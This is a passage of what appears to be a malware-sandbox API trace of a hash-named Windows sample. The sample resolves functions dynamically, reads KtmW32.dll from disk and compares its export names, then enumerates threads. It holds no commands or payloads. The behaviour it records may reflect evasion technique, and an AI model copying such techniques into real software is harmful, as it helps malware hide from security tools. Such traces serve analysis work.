(in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x415f040 | out: hHeap=0x4a0000) returned 1 [0264.328] GetProcessHeap () returned 0x4a0000 [0264.328] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b9300 [0264.328] LoadLibraryA (lpLibFileName="KtmW32.dll") returned 0x7ffc4bf10000 [0264.332] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0264.332] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0264.333] GetModuleFileNameA (in: hModule=0x7ffc4bf10000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0264.333] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0264.334] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0264.334] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0264.334] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=24064) returned 1 [0264.334] GetProcessHeap () returned 0x4a0000 [0264.334] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x5e00) returned 0x2d95030 [0264.334] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0264.334] ReadFile (in: hFile=0x17c, lpBuffer=0x2d95030, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d95030*, lpNumberOfBytesRead=0x14f5a4*=0x5e00, lpOverlapped=0x0) returned 1 [0264.335] CloseHandle (hObject=0x17c) returned 1 [0264.335] lstrcmpA (lpString1="CommitComplete", lpString2="CommitComplete") returned 0 [0264.336] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitComplete") returned 1 [0264.336] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitEnlistment") returned 0 [0264.336] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitComplete") returned 1 [0264.336] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitEnlistment") returned 1 [0264.336] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitTransaction") returned 0 [0264.336] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitComplete") returned 1 [0264.336] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitEnlistment") returned 1 [0264.336] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransaction") returned 1 [0264.336] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransactionAsync") returned 0 [0264.336] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitComplete") returned 1 [0264.336] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitEnlistment") returned 1 [0264.336] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransaction") returned 1 [0264.336] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransactionAsync") returned 1 [0264.336] lstrcmpA (lpString1="CreateEnlistment", lpString2="CreateEnlistment") returned 0 [0264.336] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitComplete") returned 1 [0264.336] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitEnlistment") returned 1 [0264.336] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransaction") returned 1 [0264.336] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransactionAsync") returned 1 [0264.336] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateEnlistment") returned 1 [0264.336] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateResourceManager") returned 0 [0264.337] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitComplete") returned 1 [0264.337] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitEnlistment") returned 1 [0264.337] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransaction") returned 1 [0264.337] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransactionAsync") returned 1 [0264.337] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateEnlistment") returned 1 [0264.337] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateResourceManager") returned 1 [0264.337] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateTransaction") returned 0 [0264.337] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitComplete") returned 1 [0264.337] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitEnlistment") returned 1 [0264.337] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransaction") returned 1 [0264.337] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0264.337] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateEnlistment") returned 1 [0264.337] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateResourceManager") returned 1 [0264.337] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransaction") returned 1 [0264.337] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransactionManager") returned 0 [0264.337] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitComplete") returned 1 [0264.337] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitEnlistment") returned 1 [0264.337] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransaction") returned 1 [0264.337] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0264.337] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateEnlistment") returned 1 [0264.337] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateResourceManager") returned 1 [0264.337] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransaction") returned 1 [0264.337] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransactionManager") returned 1 [0264.338] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 0 [0264.338] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitComplete") returned 1 [0264.338] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitEnlistment") returned 1 [0264.338] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransaction") returned 1 [0264.338] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransactionAsync") returned 1 [0264.338] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateEnlistment") returned 1 [0264.338] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateResourceManager") returned 1 [0264.338] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransaction") returned 1 [0264.338] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransactionManager") returned 1 [0264.338] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetCurrentClockTransactionManager") returned 1 [0264.338] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetEnlistmentId") returned 0 [0264.338] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitComplete") returned 1 [0264.338] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitEnlistment") returned 1 [0264.338] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransaction") returned 1 [0264.338] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransactionAsync") returned 1 [0264.338] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateEnlistment") returned 1 [0264.338] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateResourceManager") returned 1 [0264.338] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransaction") returned 1 [0264.338] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransactionManager") returned 1 [0264.338] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0264.339] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentId") returned 1 [0264.339] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentRecoveryInformation") returned 0 [0264.339] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitComplete") returned 1 [0264.339] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitEnlistment") returned 1 [0264.339] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransaction") returned 1 [0264.339] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransactionAsync") returned 1 [0264.339] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateEnlistment") returned 1 [0264.339] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateResourceManager") returned 1 [0264.339] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransaction") returned 1 [0264.339] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransactionManager") returned 1 [0264.339] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0264.339] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentId") returned 1 [0264.339] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0264.339] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetNotificationResourceManager") returned 0 [0264.339] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitComplete") returned 1 [0264.339] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitEnlistment") returned 1 [0264.339] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransaction") returned 1 [0264.339] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransactionAsync") returned 1 [0264.339] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateEnlistment") returned 1 [0264.339] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateResourceManager") returned 1 [0264.339] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransaction") returned 1 [0264.339] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransactionManager") returned 1 [0264.339] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetCurrentClockTransactionManager") returned 1 [0264.339] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentId") returned 1 [0264.339] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0264.340] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManager") returned 1 [0264.340] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManagerAsync") returned 0 [0264.340] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitComplete") returned 1 [0264.340] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitEnlistment") returned 1 [0264.340] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransaction") returned 1 [0264.340] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransactionAsync") returned 1 [0264.340] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateEnlistment") returned 1 [0264.340] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateResourceManager") returned 1 [0264.340] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransaction") returned 1 [0264.340] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransactionManager") returned 1 [0264.340] lstrcmpA (lpString1="GetTransactionId", lpString2="GetCurrentClockTransactionManager") returned 1 [0264.340] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentId") returned 1 [0264.340] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0264.340] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManager") returned 1 [0264.340] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0264.340] lstrcmpA (lpString1="GetTransactionId", lpString2="GetTransactionId") returned 0 [0264.340] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitComplete") returned 1 [0264.340] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitEnlistment") returned 1 [0264.340] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransaction") returned 1 [0264.340] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransactionAsync") returned 1 [0264.340] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateEnlistment") returned 1 [0264.340] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateResourceManager") returned 1 [0264.340] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransaction") returned 1 [0264.340] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransactionManager") returned 1 [0264.340] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0264.341] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentId") returned 1 [0264.341] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0264.341] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManager") returned 1 [0264.341] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManagerAsync") returned 1 [0264.341] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionId") returned 1 [0264.341] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionInformation") returned 0 [0264.341] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitComplete") returned 1 [0264.341] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitEnlistment") returned 1 [0264.341] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransaction") returned 1 [0264.341] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransactionAsync") returned 1 [0264.341] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateEnlistment") returned 1 [0264.341] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateResourceManager") returned 1 [0264.341] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransaction") returned 1 [0264.341] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransactionManager") returned 1 [0264.341] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetCurrentClockTransactionManager") returned 1 [0264.341] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentId") returned 1 [0264.341] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0264.341] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManager") returned 1 [0264.341] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0264.341] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionId") returned 1 [0264.341] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionInformation") returned 1 [0264.341] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionManagerId") returned 0 [0264.341] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitComplete") returned 1 [0264.341] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitEnlistment") returned 1 [0264.341] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransaction") returned 1 [0264.341] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransactionAsync") returned 1 [0264.342] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateEnlistment") returned 1 [0264.342] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateResourceManager") returned 1 [0264.342] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransaction") returned 1 [0264.342] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransactionManager") returned 1 [0264.342] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetCurrentClockTransactionManager") returned 1 [0264.342] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentId") returned 1 [0264.342] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0264.342] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManager") returned 1 [0264.342] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManagerAsync") returned 1 [0264.342] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionId") returned 1 [0264.342] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionInformation") returned 1 [0264.342] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionManagerId") returned 1 [0264.342] lstrcmpA (lpString1="OpenEnlistment", lpString2="OpenEnlistment") returned 0 [0264.342] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitComplete") returned 1 [0264.342] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitEnlistment") returned 1 [0264.342] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransaction") returned 1 [0264.342] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransactionAsync") returned 1 [0264.342] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateEnlistment") returned 1 [0264.342] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateResourceManager") returned 1 [0264.342] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransaction") returned 1 [0264.342] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransactionManager") returned 1 [0264.342] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0264.342] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentId") returned 1 [0264.342] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0264.342] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManager") returned 1 [0264.342] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0264.343] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionId") returned 1 [0264.343] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionInformation") returned 1 [0264.343] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionManagerId") returned 1 [0264.343] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenEnlistment") returned 1 [0264.343] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenResourceManager") returned 0 [0264.343] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitComplete") returned 1 [0264.343] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitEnlistment") returned 1 [0264.343] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransaction") returned 1 [0264.343] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransactionAsync") returned 1 [0264.343] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateEnlistment") returned 1 [0264.343] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateResourceManager") returned 1 [0264.343] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransaction") returned 1 [0264.343] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransactionManager") returned 1 [0264.343] lstrcmpA (lpString1="OpenTransaction", lpString2="GetCurrentClockTransactionManager") returned 1 [0264.343] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentId") returned 1 [0264.343] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0264.343] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManager") returned 1 [0264.343] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManagerAsync") returned 1 [0264.343] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionId") returned 1 [0264.343] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionInformation") returned 1 [0264.343] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionManagerId") returned 1 [0264.343] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenEnlistment") returned 1 [0264.343] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenResourceManager") returned 1 [0264.343] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenTransaction") returned 0 [0264.343] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitComplete") returned 1 [0264.344] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitEnlistment") returned 1 [0264.344] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransaction") returned 1 [0264.344] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0264.344] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateEnlistment") returned 1 [0264.344] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateResourceManager") returned 1 [0264.344] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransaction") returned 1 [0264.344] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransactionManager") returned 1 [0264.344] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0264.344] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentId") returned 1 [0264.344] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0264.344] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManager") returned 1 [0264.344] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0264.344] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionId") returned 1 [0264.344] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionInformation") returned 1 [0264.344] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionManagerId") returned 1 [0264.344] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenEnlistment") returned 1 [0264.344] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenResourceManager") returned 1 [0264.344] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransaction") returned 1 [0264.344] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransactionManager") returned 0 [0264.344] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitComplete") returned 1 [0264.344] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitEnlistment") returned 1 [0264.344] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransaction") returned 1 [0264.344] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransactionAsync") returned 1 [0264.344] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateEnlistment") returned 1 [0264.344] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateResourceManager") returned 1 [0264.344] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransaction") returned 1 [0264.344] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransactionManager") returned 1 [0264.345] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetCurrentClockTransactionManager") returned 1 [0264.345] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentId") returned 1 [0264.345] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0264.345] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManager") returned 1 [0264.345] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManagerAsync") returned 1 [0264.345] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionId") returned 1 [0264.345] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionInformation") returned 1 [0264.345] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionManagerId") returned 1 [0264.345] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenEnlistment") returned 1 [0264.345] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenResourceManager") returned 1 [0264.345] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransaction") returned 1 [0264.345] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManager") returned 1 [0264.345] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManagerById") returned 0 [0264.345] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitComplete") returned 1 [0264.345] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitEnlistment") returned 1 [0264.345] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransaction") returned 1 [0264.345] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransactionAsync") returned 1 [0264.345] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateEnlistment") returned 1 [0264.345] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateResourceManager") returned 1 [0264.345] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransaction") returned 1 [0264.345] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransactionManager") returned 1 [0264.345] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetCurrentClockTransactionManager") returned 1 [0264.345] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentId") returned 1 [0264.345] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0264.345] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManager") returned 1 [0264.346] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManagerAsync") returned 1 [0264.346] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionId") returned 1 [0264.346] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionInformation") returned 1 [0264.346] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionManagerId") returned 1 [0264.346] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenEnlistment") returned 1 [0264.346] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenResourceManager") returned 1 [0264.348] GetProcessHeap () returned 0x4a0000 [0264.348] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d95030 | out: hHeap=0x4a0000) returned 1 [0264.462] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0264.462] GetModuleFileNameW (in: hModule=0x7ffc45e90000, lpFilename=0x180013b88, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll")) returned 0x62 [0264.464] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1000) returned 0x2d95030 [0264.466] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x24) returned 0x4a8840 [0264.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="opj_get_cstr_info", cchWideChar=-1, lpMultiByteStr=0x4a8840, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opj_get_cstr_info", lpUsedDefaultChar=0x0) returned 18 [0264.466] GetLastError () returned 0x0 [0264.466] SetLastError (dwErrCode=0x0) [0264.466] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_get_cstr_infoW") returned 0x0 [0264.466] GetLastError () returned 0x7f [0264.466] SetLastError (dwErrCode=0x7f) [0264.466] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_get_cstr_infoA") returned 0x0 [0264.466] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_get_cstr_info") returned 0x7ffc45f1a890 [0264.467] GetActiveWindow () returned 0x0 [0264.467] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d95030 | out: hHeap=0x4a0000) returned 1 [0264.467] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a8840 | out: hHeap=0x4a0000) returned 1 [0264.467] GetCurrentProcessId () returned 0x126c [0264.467] GetCurrentThreadId () returned 0xcd0 [0264.467] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0264.481] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.482] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.483] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.483] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.484] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.485] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.485] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.486] Thread32Next (hSnapshot=0x17c, 